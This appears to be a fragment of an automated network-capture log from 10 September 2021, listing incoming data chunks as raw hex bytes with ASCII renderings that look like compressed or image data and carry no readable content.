                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC232INData Raw: f7 ba 69 c7 c9 55 72 56 37 c9 53 b0 b9 f3 b4 c8 96 a0 9f 6c 87 8f c7 45 98 12 a9 ac cc 51 57 39 e5 bb 7e c1 a0 bf 24 b1 96 6b 53 e8 f9 13 a1 d8 7b c0 a3 4c ba 1f a9 f4 fd 56 18 5f ec f2 be d5 b2 0b 82 a1 a4 8d bb 1a 88 16 cb ca 92 b2 2d f3 e0 af 07 92 4c c2 b9 6c ec 48 37 f7 d5 b5 e5 d2 16 0a 52 26 ea c6 99 52 8f 97 3f ee 0c bd 7b a7 49 06 b9 95 a9 4a 02 e3 65 0c 1c d5 7e 24 1d c8 e3 d8 cb b8 58 fd 68 d2 26 3c ff 00 98 5f 8e 57 e1 94 13 2f 09 2e 6d d6 da ef f8 d8 dc 5b 29 5f 70 8a 06 38 7f 6d d1 ff 00 34 10 8d e2 cc 8b 50 78 36 b8 90 e3 22 07 f3 1d b3 bb 83 cd 32 8a ba be 78 fe fd 31 62 0d 2a c5 bf 20 79 8f 8b 42 80 63 18 85 01 ca f9 3b 1e cc 42 33 47 8d 8e 93 c3 14 4e 34 cc a4 ee 64 cb 08 7d d2 94 b4 50 37 01 b1 98 15 a3 f3 c5 57 5d 2a f1 a5 0d fc 99 b4
                                                                                                                                                                                                                                  Data Ascii: iUrV7SlEQW9~$kS{LV_-LlH7R&R?{IJe~$Xh&<_W/.m[)_p8m4Px6"2x1b* yBc;B3GN4d}P7W]*
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC234INData Raw: 49 49 52 52 1c 9e 5f 91 7e f4 85 a6 87 06 a1 83 85 eb 3d 1f 2e 04 59 32 71 21 95 89 7d cd 1c d1 65 30 86 78 9d 7d af 1b a9 0e 8e 18 92 a4 72 38 e9 95 78 d6 e0 b8 19 e9 52 45 da f9 0c a1 34 25 52 d4 04 d6 4e 74 20 e7 4b 57 a7 f7 1f a4 cc 3a 86 8b 14 93 18 cc 9a 4e 50 c5 92 35 3e e5 88 84 74 9a bf e9 63 6a d6 40 03 83 f1 d4 48 c2 aa 37 8e ef ad 8f ea ff 00 10 d9 5a 54 03 1b 0a f7 df c4 65 d6 72 22 d5 fd 3b 8b 1d 29 a5 96 16 02 83 89 d2 45 d8 68 d6 e4 78 8d 02 b6 45 7e 01 eb a8 4e 05 8e 40 9e a4 40 f8 82 26 4a 38 4b b3 83 b7 7d e7 02 7a 16 39 10 eb 52 44 52 44 dc c8 e1 ec aa 3c 34 e0 fe 03 80 0a 83 c5 50 e7 a6 27 cd 0a 42 46 80 81 7b b3 5c e5 6e 4f 76 68 53 85 01 25 78 80 cb 21 57 7a 96 1e 7a ed 96 6d 76 08 33 f4 f7 48 f7 49 b2 25 66 0a 46 f3 14 eb db 61 b8
                                                                                                                                                                                                                                  Data Ascii: IIRR_~=.Y2q!}e0x}r8xRE4%RNt KW:NP5>tcj@H7ZTer";)EhxE~N@@&J8K}z9RDRD<4P'BF{\nOvhS%x!Wzzmv3HI%fFa
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC235INData Raw: ee 91 5b 2f e9 fc 41 90 12 a5 93 38 2c 38 c4 c5 85 d8 bb 54 00 f5 6f 38 d5 f4 37 f5 0b 36 3f a6 f5 8d 3b 2f 12 0c 9d 4b 3b 0b ed 20 c9 c8 5c 67 c5 c7 cd c8 92 41 95 9a e3 21 49 77 ec 15 68 d1 29 c4 e0 9a 03 9e a0 9e 28 11 84 c9 7b 92 41 16 f3 7e 40 31 cb 78 b3 e2 3e 8a a9 ab e1 e6 c8 e2 d4 99 78 52 26 a6 a1 8a 40 0a 2f 9b d6 99 96 bc 48 fa c7 eb 07 a6 64 c2 c5 97 4d d1 70 b4 cd 4b 1b 16 18 27 d4 70 96 3a c9 c9 8b 29 cb 4e f1 c6 aa 63 99 e1 90 32 f0 51 3b 64 00 77 0e 93 e2 67 4a 5f fc 68 92 e4 ff 00 90 1f c0 81 a9 f3 b8 eb 68 2f 09 c0 71 52 78 99 cf c4 95 f0 eb 28 c2 e4 9a 31 04 04 93 40 f4 dd b3 81 fd 4b fa bb fa 89 fe 03 ad fa 3f 03 50 8d b0 35 27 c7 c8 76 87 4d 8b 2e 71 34 18 18 f8 63 1f 23 3b 26 08 44 30 cb 0c 17 30 8e 99 49 d9 b8 d0 a7 78 6f ae f1 9c
                                                                                                                                                                                                                                  Data Ascii: [/A8,8To876?;/K; \gA!Iwh)({A~@1x>xR&@/HdMpK'p:)Nc2Q;dwgJ_hh/qRx(1@K?P5'vM.q4c#;&D00Ixo
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC236INData Raw: 0e 1d b3 7a 77 be 71 51 c6 f1 69 95 26 6c d5 a8 25 08 42 80 53 39 0a 67 14 1e 63 f0 e6 3f 9e 2f a8 3f 54 f3 7e a7 fd 67 92 71 99 2c 9a 6e 06 a2 61 c3 75 6d d1 fd 96 04 59 13 cb 3d 00 54 ab 08 2f 70 aa 06 fe 47 5f 74 fa 2f d2 53 c2 fd 3e 5a e6 25 21 65 20 11 72 c6 a1 d8 6c fa 65 1f 9b 3e bd f5 75 f1 bf 52 9c 84 cc 2b c1 34 91 42 3c 36 17 f3 b9 a8 78 0e d0 71 1a 48 75 bf 50 b4 85 a4 91 9a 04 76 22 d5 25 69 27 75 36 39 34 d4 42 d9 50 7f 34 3a f7 11 30 09 8c 0f 80 28 bf 9d 86 b6 f6 19 39 e4 94 92 9c 4a 60 40 ab 76 2f 97 c3 c6 5f 48 c0 63 19 af 92 fb 76 e5 be a3 91 1a 8f 67 6e 34 91 91 59 80 b0 a0 b5 b0 e2 eb f2 6b a0 f1 25 2e 84 9f 09 50 48 14 05 ec 7d 5d f6 a6 8f 16 3c 22 12 42 a6 02 e9 00 b9 b1 76 bb 7f 4f 0f 6f 45 ec 3e 8d d4 72 89 8c 43 91 24 ca d1 b0 63
                                                                                                                                                                                                                                  Data Ascii: zwqQi&l%BS9gc?/?T~gq,naumY=T/pG_t/S>Z%!e rle>uR+4B<6xqHuPv"%i'u694BP4:0(9J`@v/_Hcvgn4Yk%.PH}]<"BvOoE>rC$c
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC237INData Raw: be 81 d2 9b 2f d7 9a 6c 30 ec cc 58 b2 b1 9a 6a 2c 08 24 2d b9 af 21 2b 8d b5 cf cd 1e bc 94 e1 98 86 ff 00 a9 72 d4 f3 c8 dc d7 61 10 5a 0a 85 0b 1e fb 3f 11 6c 7e af 66 a0 f4 ce af c5 c9 d9 8f 0a 1a 7a 91 3b 6a aa c1 0d 59 dd fe 61 f3 fc 73 d4 27 a4 25 78 b5 a3 db bb 12 63 c8 40 4b 0c 40 9b 36 7d 03 fb b5 2d 9c 50 96 85 61 83 27 36 46 6a 35 1b 29 bd db 54 37 c7 e2 ff 00 02 8f e0 9e ab d4 7c 24 03 5d 2e 6f ce 2d a4 24 84 e2 48 20 e4 6b db 5a 01 af ee d3 3b 28 c4 c6 9a 47 1b b6 95 2a 48 48 c8 3c 13 21 35 b5 4f 00 7f 37 d4 c1 fe 27 96 56 ef b3 0f a4 15 8a d2 86 95 7a bf b9 0e 79 f9 4e 7a 73 4a 7d 23 d0 11 66 66 c4 17 33 50 d7 32 fe d8 f7 06 d0 02 01 6e 2c 95 da 1c d0 aa b0 0f 42 9a 42 e6 1d 77 6f 3a f5 bc 12 54 a2 94 7f 20 75 2f a6 9f bc e2 0b 4b c5 39 59
                                                                                                                                                                                                                                  Data Ascii: /l0Xj,$-!+raZ?l~fz;jYas'%xc@K@6}-Pa'6Fj5)T7|$].o-$H kZ;(G*HH<!5O7'VzyNzsJ}#ff3P2n,BBwo:T u/K9Y
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC239INData Raw: f3 09 2e 2b 7a 65 4c ef 0e 09 84 b5 80 d4 0c b9 bf 75 d5 e0 ce 19 3b f0 7b e3 f7 88 d7 60 e0 6d 4e 15 ca f1 e0 29 fd c4 51 f3 d7 88 6e 7b 56 dc bf b8 f4 c6 a3 10 6f 62 fa 77 61 01 be a4 d1 97 33 1d bd d2 89 0e e4 8c 3e cd a2 22 01 01 02 78 db fb b9 16 47 8f 3d 3d c2 2d 81 0f 5b d4 b3 93 93 1a fa bf 93 c2 5c 44 a0 b4 bb 57 af 4b 7a c5 5c f5 3c 79 5a 0e 69 99 b1 9e 48 22 73 dc 8e 32 db b9 dc 0b 90 3f 71 5b b2 08 f3 43 ab 19 73 30 87 70 49 dc 6b dd 2d 15 2a 41 b1 a1 15 07 cb 56 7c 9a 02 f5 7f 4b 7a 73 d6 f8 cd 3b a5 66 64 42 2e 63 60 e3 ca 78 56 2b b8 50 a0 a1 48 16 a7 9a f8 ea d7 85 e2 97 89 20 29 83 ea 58 b6 54 c9 f5 6d 21 89 7c 4c c9 4a 48 53 b6 bf e3 a6 ff 00 80 08 ca 11 7a af a2 3d 53 e9 89 da 48 20 fb ec 18 cf 64 e5 22 4a e7 b5 76 37 1f 1c 82 2e 8d 9a
                                                                                                                                                                                                                                  Data Ascii: .+zeLu;{`mN)Qn{Vobwa3>"xG==-[\DWKz\<yZiH"s2?q[Cs0pIk-*AV|Kzs;fdB.c`xV+PH )XTm!|LJHSz=SH d"Jv7.
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC240INData Raw: af 33 da 07 88 ff 00 d4 f6 e6 d5 fc 3f 9c 02 6a 59 e9 2e e8 e4 88 0b 56 3b 89 0a 42 81 f1 56 38 1c 1f f4 e8 fb 16 a9 a3 9f 2c b5 cb 9c 73 19 cd 3f 1e c0 77 ce 03 73 73 96 31 19 89 04 aa 03 06 62 dc a9 55 f0 7f 9e 45 7e 4f 4e fd bf f8 f1 83 50 d5 1a 3d 45 2d d9 e7 13 32 96 6a 81 ea 07 af f5 00 3a 96 6c 5b 67 86 42 c5 e4 6d ea 07 84 dc 00 71 74 4b 50 fe c2 f9 ae a7 2d 6e 46 ae 01 b7 58 2c d3 81 09 52 5f 22 48 b8 eb fb 66 80 2d 47 50 12 c7 24 6c e5 63 8d 09 8e 41 7b 26 5b 02 34 2c 39 59 37 8f f2 90 07 00 f4 56 f1 bb 10 1c fb 6b bc 23 36 79 4e a6 8f e7 5e 5e 76 6e 50 b0 d4 35 f2 6d 25 95 95 55 65 17 65 4f c8 2b 29 f3 ed 36 0d 1f 04 1f 9e 8e 56 95 80 12 9a 80 01 20 5d bb de fc a1 64 a5 75 26 80 d4 12 e2 86 d5 35 84 37 ab 75 f1 8d 1c f4 77 47 26 e7 54 12 c8 d1
                                                                                                                                                                                                                                  Data Ascii: 3?jY.V;BV8,s?wss1bUE~ONP=E-2j:l[gBmqtKP-nFX,R_"Hf-GP$lcA{&[4,9Y7Vk#6yN^^vnP5m%UeeO+)6V ]du&57uwG&T
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC241INData Raw: cf 30 c6 6e e5 02 3b 68 87 b6 77 37 3c ec e4 b0 a2 38 a3 c7 3e e2 d5 e3 94 4e a2 ad 45 1a 10 77 b8 f3 b4 17 87 29 21 69 b1 21 9a 8e 2b 5e fa b5 e1 b7 a6 60 c5 16 4e 9d f6 f2 b3 45 87 26 2e 5c c2 25 65 92 50 ae 8a ec c6 ff 00 e5 82 df a8 e6 bc 1a e9 25 0a 1d c3 da 96 ca 95 f5 ca 19 4d 28 82 ed a5 7c e9 d6 d0 ca d6 32 53 1f d4 39 b0 6a 0e af 3c 98 f0 e4 44 f1 15 41 26 31 3b 62 3b 36 d1 ed ab 2a 6f 50 03 5f 3c 9e b9 8b 00 0d ca 94 1e 63 f3 f3 03 2a a9 0a 4e ad 4d f7 8e dc 2b 81 b8 7b 88 23 92 05 01 fc fe 68 78 f3 cf 5b 28 c1 c4 94 2d ed da 43 1a db e3 f9 fc 9b e3 8e 7f 8f c7 42 59 01 49 76 eb 9d 69 10 53 62 96 ec cf 5f 34 db b7 78 fd b9 41 b2 b5 4c 07 3c fc f0 2e c0 e3 cf f7 ff 00 b9 10 bc c7 51 97 7a 44 26 39 99 ff 00 1d 9f 3d bd 7e 46 70 0d ea ec 65 cb d4
                                                                                                                                                                                                                                  Data Ascii: 0n;hw7<8>NEw)!i!+^`NE&.\%eP%M(|2S9j<DA&1;b;6*oP_<c*NM+{#hx[(-CBYIviSb_4xAL<.QzD&9=~Fpe
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC242INData Raw: 4e 8b 99 8b a1 6b 53 7f c0 c9 29 4c 4c 9b dd 26 2b ca 08 a1 66 fb 4c e4 7b 49 01 6b c0 e3 aa 1f ad 7d 29 2b 49 e2 64 a6 a9 0e 48 1b d4 81 71 be a7 7a c5 e7 fa 7b ea 82 5a c4 99 c7 fe 42 a6 00 e4 28 07 5c 85 c1 25 84 74 33 d2 5a e0 c8 86 38 41 8d 58 39 06 7d 85 9b 72 fe c9 05 10 cb 1b 8f 71 00 b5 d9 e7 ac 54 d4 a9 9d 7f cb b1 ec c7 e6 3e 93 c2 cc c4 c0 dc 8a f9 3d 6f 56 f2 c8 da 1c 7a 3e a0 e8 62 2c c1 e1 26 50 84 b5 6f 11 ad d8 3c 00 c1 8e d0 a5 43 30 a5 dd 67 8a e9 88 da c6 8f 57 fd fa b8 87 a5 cc fb 4a 77 6c 5f ae f2 15 d0 43 af d2 fa be c6 58 bb c0 a4 85 56 35 09 db 65 2f 4d ee 23 dd ed 20 92 a2 cd 50 e6 fa ad 9f 2b 1f 47 34 d3 41 95 0d 2f 7a 67 16 b2 a6 3e 15 8b 83 ce da 7c 69 48 b7 5e 91 d6 65 6c 41 01 95 56 51 b4 46 f6 2c d0 bd c1 3f f8 54 aa 6e ff
                                                                                                                                                                                                                                  Data Ascii: NkS)LL&+fL{Ik})+IdHqz{ZB(\%t3Z8AX9}rqT>=oVz>b,&Po<C0gWJwl_CXV5e/M# P+G4A/zg>|iH^elAVQF,?Tn
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC244INData Raw: 5f 34 c2 e8 0e 39 16 7c 74 bf 8b 15 6d 57 bf ab e7 fb de 0c 94 e0 3b 87 77 3c c5 28 dd 2b 5f 4d cc 4d 38 99 1a 55 5d e7 6d 90 ff 00 e5 66 f6 9a 03 81 55 75 e2 c7 5d ec 3f 7c c6 74 ad 60 84 9a e9 66 a5 46 d9 d4 11 af 38 de 8f 13 b4 bf b0 ae fb 70 1e 46 21 80 e7 85 ba db f3 fc fe 3a 1a ef d3 e4 c4 33 b3 ed fa a7 94 79 65 8b b9 fa 1f be 88 90 80 a5 78 00 9f e2 fc f1 e6 ba 84 79 b7 ad 73 a3 74 cc c0 ec ef 29 c8 b8 5c 32 ee 3d c1 b7 b6 45 2d 72 7e 7c 5d 57 81 43 af 04 b9 dc c7 8d 1b e6 87 c9 cb 76 62 27 37 26 d0 c6 77 3c 85 ac 9f 85 3c 6d af e3 f8 1e 49 f8 3d 10 06 55 f2 7e fb 36 f2 ee 6f 5a 7b 5e 96 a6 b4 6c f3 68 0e d4 1c a2 c8 ec cd 54 a4 07 0a 05 b0 e4 71 c9 04 83 c0 15 fc f1 7d 10 07 2c 19 fd b5 e5 dd e3 c5 29 50 63 77 a0 ae 4f 4a b6 ba be d9 42 e3 3b 3d
                                                                                                                                                                                                                                  Data Ascii: _49|tmW;w<(+_MM8U]mfUu]?|t`fF8pF!:3yexyst)\2=E-r~|]WCvb'7&w<<mI=U~6oZ{^lhTq},)PcwOJB;=
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC245INData Raw: e6 9b 86 25 0b c2 ab 05 30 19 76 dc be 4d bf 18 9f bd 2c 29 19 87 7b be 8d eb d6 16 fe 9b c9 fb 3d 57 1e 5c c8 24 fb 9c 29 44 6d 16 dd ed 2a 4a a7 1c 2a c7 f3 b0 4a 48 f9 20 6e e0 01 d5 94 e5 80 13 87 36 2c c6 e7 9e a3 d8 45 67 0c 56 66 10 af e4 1c 1d c3 d1 f9 b6 74 e7 05 be 9b 30 69 0d ac 61 46 85 26 10 4b 93 90 1c ec ed 42 d9 6b 1e d0 2c 33 6d 56 69 36 af 14 40 35 7d 02 62 04 d9 60 b3 94 6c f7 7d 74 6b 6d 48 3c bf 04 d5 b7 f9 d4 f9 57 c8 e4 f9 c4 de b3 a4 4b 87 95 a6 e4 cb b8 3e 52 41 0c 66 38 ff 00 2a 29 db 68 3c 04 ad d7 5e 68 f4 a2 4b 02 96 0c 6a d5 6f 4f ee 90 da a5 b1 4a f5 3c d9 ea ef dd cc 6f fa 3f 0b 2a 0f 57 6b f8 d8 98 f1 2e 31 d1 cf 6d 42 8a 92 49 d5 9a c8 37 c6 dd ed 60 7c 78 e8 9c 72 0f d8 90 bd 14 0b 5b 3d 33 7a 7c 35 e3 bc 38 79 d3 45 dd
                                                                                                                                                                                                                                  Data Ascii: %0vM,){=W\$)Dm*J*JH n6,EgVft0iaF&KBk,3mVi6@5}b`l}tkmH<WK>RAf8*)h<^hKjoOJ<o?*Wk.1mBI7`|xr[=3z|58yE
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC246INData Raw: a5 f9 da 97 78 80 59 94 a7 4d 46 6c 4d fe 69 71 b6 70 48 b8 a9 a7 7a 93 2b 19 d9 55 a4 c4 97 0e 64 42 c1 5a 4c 70 19 64 8c 30 f0 d1 08 f6 11 c1 5a 16 7a 12 86 21 42 7c 2d 50 43 db 6d 33 af cc 19 33 70 ab 11 ff 00 3a 07 17 cf 6b 46 e4 b0 42 d9 70 e2 aa ef c2 d4 b1 64 92 27 42 36 be 44 47 f5 05 0f 0e c2 89 1c 12 41 3d 23 3a 61 96 03 30 20 b1 35 d6 fb e7 94 5a c8 69 a0 0a 0f 09 63 53 50 1c 67 d3 f2 60 2f 55 23 ed 21 12 a9 8e 6c 59 72 30 a5 20 6d 77 11 27 77 1d 8e e1 56 f0 8d a7 e6 ef cd f5 63 c1 ac 2f 0d 58 92 06 81 dc 75 f3 7c b3 8a 3e 3a 5a a5 95 51 c1 b3 9b 0a eb a5 b4 35 8a b1 ea 5c 44 78 33 5e 24 0c 44 d2 4d 1a 9f 3b 09 24 98 c0 fd a7 c1 3f da f8 e3 ad 6f d3 66 32 83 9b 01 43 51 5c c8 f9 a5 29 ac 63 fe a5 25 d2 59 3e 20 f5 03 c5 b7 2c c7 bb 90 61 65 fb
                                                                                                                                                                                                                                  Data Ascii: xYMFlMiqpHz+UdBZLpd0Zz!B|-PCm33p:kFBpd'B6DGA=#:a0 5ZicSPg`/U#!lYr0 mw'wVc/Xu|>:ZQ5\Dx3^$DM;$?of2CQ\)c%Y> ,ae
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC247INData Raw: 8a 5c 83 98 bf ce 79 69 ab 3b cb 45 fa 63 87 b2 27 8f 10 6d 0a a7 f4 c3 ee a3 4e e1 9d 89 db ca d5 00 45 5d 79 ae 96 3c 42 cb 65 c8 d0 f6 3d 75 86 04 a2 9b 00 2f fd 77 a7 9b 9f 43 f4 3b c7 da 93 b4 cf 0e c0 63 8d 52 c0 14 17 60 60 a3 f6 df 03 82 79 34 3a 1a a7 07 b0 e9 96 ae df 2f f8 61 08 d3 a9 fd 69 93 57 d6 1b da 07 a5 57 1a 08 58 e3 c7 4f 16 f6 62 4a 80 37 1d 8a 55 94 51 b5 a2 09 b0 38 1c 9e 96 5c e1 e6 e4 57 23 98 14 68 e8 93 e2 27 33 9e a4 f6 d5 3b c1 be 16 02 63 1d c4 ab b2 b0 69 23 8f 80 ae 40 0b 19 66 25 77 6e 27 83 c9 22 fc 74 9c c9 a5 4a 61 50 c1 ab 89 ea 7f a6 ad e1 d9 61 92 01 be 27 77 1a 79 b0 c8 3f 57 68 97 83 1f 22 5d e1 e2 54 8d d9 09 61 b7 70 93 c1 b2 38 66 ae 0d 71 44 58 e8 24 10 ce ed 90 f4 27 d7 d2 91 36 0e f7 3e a6 85 d8 91 96 f7 ab
                                                                                                                                                                                                                                  Data Ascii: \yi;Ec'mNE]y<Be=u/wC;cR``y4:/aiWWXObJ7UQ8\W#h'3;ci#@f%wn'"tJaPa'wy?Wh"]Tap8fqDX$'6>
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC249INData Raw: c4 99 19 93 3b 17 07 95 0c 40 54 22 b7 5d 8e 05 74 59 4a c6 a5 83 9b 61 7a ed 9f 3b d5 9b 4b 4a 72 42 52 85 30 60 92 32 b9 20 f7 a5 62 2b d2 93 c7 f7 9a ee 3a ac 05 31 f2 b4 08 d0 90 1f 64 c6 d1 ca 0f 05 bf e2 36 83 44 af 3c 75 e9 c9 32 f0 97 cd dd fc f2 f7 1e 90 34 ff 00 ca 02 5a f7 60 1a 9a d9 ef b0 d6 15 b3 e9 59 18 be b8 d5 31 0c 6d b5 f2 9e 45 3d c6 50 c6 30 8e ac 8e b6 b7 dc 56 1e e1 62 ab f3 d5 a4 c9 c9 5f 0f 25 92 03 8a 38 a9 a0 2f e4 29 f8 8a f4 f0 eb 1c 4c c2 3c 29 1f e2 09 01 9c dc 06 17 a7 36 34 0d 06 be ac d3 e2 c5 11 cf 8f 59 0a f1 0b 6f 98 51 f2 ce 43 ee 3f b6 c0 71 c0 b1 c9 e9 59 13 4a 54 41 24 0a fb d8 79 de 08 a9 4c 6a c7 57 6e 77 6e ce b0 27 a4 e9 b0 e3 e6 0d 4b 21 d6 08 b4 c3 3c 73 bc 80 b0 c6 59 99 d9 a7 da be 64 30 c9 db 41 56 4b ff
                                                                                                                                                                                                                                  Data Ascii: ;@T"]tYJaz;KJrBR0`2 b+:1d6D<u24Z`Y1mE=P0Vb_%8/)L<)64YoQC?qYJTA$yLjWnwn'K!<sYd0AVK
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC250INData Raw: 72 7b 8f f8 6c 6d b9 5c 02 23 97 3d 14 29 26 ff 00 79 01 43 df 1c df c7 4e 2d 45 d0 9c b0 d4 6e 05 fb a1 0d b4 28 bf e0 56 2f 88 80 fa 53 dd fd 20 2f 57 96 0c ac 48 b4 e9 98 41 38 13 cf 8c 5c 0d a5 0c c5 76 06 3c 13 7b 9a af 75 0b f1 d3 92 1d 20 bf f1 28 3d 5d aa 33 f3 6e 4d 0a cc 0e a4 0e 6a 7f fd 85 88 fe be 22 13 5c c1 8f 23 54 f4 d6 b7 91 20 33 62 c5 a5 e3 65 b0 04 b0 78 b2 64 c2 96 77 00 d2 b3 6d 88 9b e3 6b 06 3e 47 53 05 e5 ad 00 b2 6f 91 ad 33 2f cb 3b f9 f1 24 09 c8 54 c0 14 49 60 6b 61 b0 0d 9f 4d e3 43 58 c5 68 32 b2 31 5a 49 1a 59 b2 b2 a0 8a dc 95 4a 7e ec 5b 80 00 8f 6b 29 06 8f 90 2f cf 50 4a 02 bc 27 09 37 34 14 03 d6 9a eb a4 32 b2 a5 02 09 f0 87 29 1d d9 9b 28 5e 61 1c 6c ac bd 6d e7 9a 08 35 2c 3d 2b 53 c1 c9 c6 50 0f de 48 d8 ec 71 f2
                                                                                                                                                                                                                                  Data Ascii: r{lm\#=)&yCN-En(V/S /WHA8\v<{u (=]3nMj"\#T 3bexdwmk>GSo3/;$TI`kaMCXh21ZIYJ~[k)/PJ'742)(^alm5,=+SPHq
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC251INData Raw: 67 37 3a f5 82 b8 7e 9d 44 8b 19 8e 07 64 95 d2 1c a2 54 95 12 1b 00 29 dd c8 56 ab 35 c1 1e 7f 03 33 0a 4f 85 4c 3c df e4 fa f4 b4 59 4b e0 69 e2 01 8d 5c e7 a1 d6 da f4 82 ac 3f 40 6d 53 db c6 45 46 8e 25 65 21 64 31 4a b6 18 ff 00 d7 4c 00 25 45 9b 22 f8 e8 53 78 a5 0c e9 dd 7e 35 39 41 13 c1 b4 c6 64 9a 73 2d 6c ff 00 05 ab a0 7d 85 f4 0d 77 82 60 96 59 29 89 89 76 ed 7a a0 c0 91 57 40 ee a1 f1 cd 71 d0 93 c4 bb d5 47 af 7f d6 e6 85 4f 02 93 8b 12 5e ec 1e d7 76 39 38 6a d9 9f 68 99 c1 fa 79 26 c8 e7 8f 4d 6e 17 61 32 53 33 a7 90 44 61 54 82 4f 0b 56 08 16 3a e7 df 52 96 52 09 c3 4d f2 7b 57 ba d2 3a 9e 0a 58 50 f0 6c 1e 8f cf 6e af 12 c9 f4 f0 80 c1 70 16 58 65 42 d2 dc 4d dc 8f e7 65 5f cd 50 e0 f2 3e 3a 5a 64 f5 02 40 7a b9 0e 05 c6 d5 77 d7 3d a1
                                                                                                                                                                                                                                  Data Ascii: g7:~DdT)V53OL<YKi\?@mSEF%e!d1JL%E"Sx~59Ads-l}w`Y)vzW@qGO^v98jhy&Mna2S3DaTOV:RRM{W:XPlnpXeBMe_P>:Zd@zw=
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC253INData Raw: 2d e8 5f 4d 7d 3d c3 d8 19 57 13 2f 53 60 e8 49 65 4f b8 cb de a0 82 c4 00 aa 43 82 db 8a 8f 17 d5 47 0f 34 f1 1c 54 d5 a8 bb 16 14 de 9a 01 7c b2 8b 8e 21 03 84 e1 50 84 f8 4a ae 93 7f e3 cd fc ad 14 8f 56 49 35 6d 53 2a 33 ec 4d 43 d4 7a 6c 68 08 27 f4 59 c4 20 78 1b e9 18 31 03 8a e7 c0 eb 69 c3 11 2b 87 24 0b 4a 51 0e cc ec a2 0f 4e da 31 53 d2 a9 dc 42 12 f4 5c c4 e4 6b e2 76 24 30 16 3c ab 16 db 03 4e ff 00 11 d5 bd 2f a0 63 4c 63 56 d4 b9 04 5d 26 12 c0 91 b0 50 b4 ec ce 09 40 3c 28 2d f0 6f 19 3c 90 9e 26 79 fe 6a 52 92 14 cd 77 0c d5 1d 5b 93 56 37 fc 1c a5 19 92 64 03 ff 00 18 48 56 16 a5 1b a9 db 97 28 69 fa df 2b 33 50 1e a4 d2 23 57 3a 72 87 c4 0e 81 88 c7 90 64 15 9e 75 55 04 30 c9 10 ec 2c a3 6e e3 ee f9 ea 93 83 49 44 e1 31 5e 25 86 af ab
                                                                                                                                                                                                                                  Data Ascii: -_M}=W/S`IeOCG4T|!PJVI5mS*3MCzlh'Y x1i+$JQN1SB\kv$0<N/cLcV]&P@<(-o<&yjRw[V7dHV(i+3P#W:rduU0,nID1^%
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC254INData Raw: 91 9d 6b 27 35 e7 28 cf 0c 92 c7 ee b5 ee 22 d2 02 7f cc b7 cd 0f 06 ee 8f 51 52 d2 95 24 1a b8 2c 4e c6 9e 59 96 f9 63 cb aa 0b 80 18 86 bd 8e 7a 64 df d4 2d 3d 6d 23 ea 79 19 59 12 b8 23 18 14 4d a3 6d 48 db 5a d0 9e 45 03 c5 9e 6f cf 3d 25 30 cd 33 7f 88 6d 74 71 5a 8b f3 f2 87 65 07 97 be 1b f5 14 cf 5c 9d 98 0b 88 58 e9 10 e4 cd ab a4 10 37 6d a6 7c 74 b3 ce ff 00 7f 3b e8 82 14 d8 b2 79 e3 cf e2 33 e6 00 9a 96 b3 35 1a f5 e5 91 86 78 34 15 2b ce d5 be e6 d6 e5 13 7e aa c1 8f 0b 52 cd c2 69 c6 44 89 a5 bb aa a0 1d a0 cf 6c 62 f3 b8 b0 37 e5 88 aa e9 69 58 a6 1f 0b 90 0e 46 f5 af 9f e6 1c 9c d2 80 26 8f 40 fa e5 68 f3 01 91 3d 0d 83 17 7b 1d 5c 4d 03 42 2f da 66 95 9b 78 66 04 b2 ed 23 6b d1 fc 5f 4e 29 20 9c 44 b3 fb f5 ef e4 42 62 80 c2 2a ef b9 f4
                                                                                                                                                                                                                                  Data Ascii: k'5("QR$,NYczd-=m#yY#MmHZEo=%03mtqZe\X7m|t;y35x4+~RiDlb7iXF&@h={\MB/fxf#k_N) DBb*
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC255INData Raw: 0c 6e fb 95 94 6e 56 60 76 00 39 0c 4d 6e bf 81 f9 fc f5 4b c5 c8 c6 08 a8 2c 6d 5c a9 b8 70 2b d2 2e f8 49 a1 d2 5d d8 8c e8 ef 6d 47 56 b4 5c 9f 4c eb a9 95 1c 06 29 01 13 c6 7f 6b 2b 3b 86 71 7b 15 b8 08 56 d4 12 45 51 ea 86 6c b6 38 6b b6 be de 63 58 d2 49 9d 8c 00 00 ec b7 4f 2e 8c ce d8 c0 cf 54 93 20 89 37 28 8c 47 0e d2 24 da 10 f0 b2 35 78 5a 2c bc d0 22 87 49 a8 02 e9 ad 33 a5 3d fe 7d 8c 31 2e 62 90 a0 1d c1 56 66 97 67 b9 ca 1b 1e 9e 38 79 06 39 03 87 90 c2 c5 77 d2 23 b8 0b 44 85 1c 53 83 ba f9 26 ff 00 3d 2c a5 e1 51 4b 3b 73 7a fb 7a c5 c2 16 b0 10 ac 45 89 66 7f 9b f9 d2 b9 41 e4 10 09 e2 db db dc 8d b8 92 80 6e 75 90 2e e5 2b 77 db 0f 7b 49 20 71 55 f9 8a dd c1 15 1a 8d 9e 2c 12 4d 09 a8 f9 05 bd 40 7b 5e 27 f0 71 44 44 e3 46 65 7b 51 24
                                                                                                                                                                                                                                  Data Ascii: nnV`v9MnK,m\p+.I]mGV\L)k+;q{VEQl8kcXIO.T 7(G$5xZ,"I3=}1.bVfg8y9w#DS&=,QK;szzEfAnu.+w{I qU,M@{^'qDDFe{Q$
